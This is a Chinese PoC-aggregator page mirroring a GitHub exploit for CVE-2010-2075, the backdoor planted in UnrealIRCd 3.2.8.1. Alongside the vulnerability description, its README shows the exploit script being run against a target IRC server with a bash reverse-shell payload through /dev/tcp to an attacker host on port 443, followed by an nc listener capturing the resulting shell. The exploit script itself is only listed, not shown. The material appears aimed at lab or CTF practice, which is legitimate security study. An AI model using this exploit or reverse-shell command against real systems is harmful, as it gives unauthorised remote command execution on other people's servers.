POC详情: 79429cee848a8d99a8f0e01b2df4ea093410da0a

来源
https://github.com/FredBrave/CVE-2010-2075-UnrealIRCd-3.2.8.1
关联漏洞
标题: UnrealIRCd 后门未授权访问漏洞 (CVE-2010-2075)
描述:2009年11月到2010年6月间分布于某些镜面站点的UnrealIRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的修改(特洛伊木马),远程攻击者可执行任意命令。
描述
Exploit for CVE:2010-2075. This exploit allows remote command execution in UnrealIRCd 3.2.8.1.
介绍
# CVE-2010-2075
Exploit for CVE:2010-2075. This exploit allows remote command execution in UnrealIRCd 3.2.8.1.
# Requirements
optparse, signal
# Usage
You can send a command to execute, but there will be times when it will not respond, but you can simply send a reverse shell and wait for it to arrive.
```bash
python3 CVE-2010-2075.py -t 10.0.2.119 -p 6667 -c 'bash -c "bash -i >& /dev/tcp/10.0.2.48/443 0>&1"'
Creating connection
Creating payload
[*]Sending Payload...
```
And I received the shell
```bash
nc -nlvp 443
listening on [any] 443 ...
connect to [10.0.2.48] from (UNKNOWN) [10.0.2.119] 56916
bash: cannot set terminal process group (415): Inappropriate ioctl for device
bash: no job control in this shell
server@real:~/irc/Unreal3.2$
```
文件快照

 [4.0K]  /data/pocs/79429cee848a8d99a8f0e01b2df4ea093410da0a
├── [1.6K]  CVE-2010-2075.py
└── [ 751]  README.md

0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。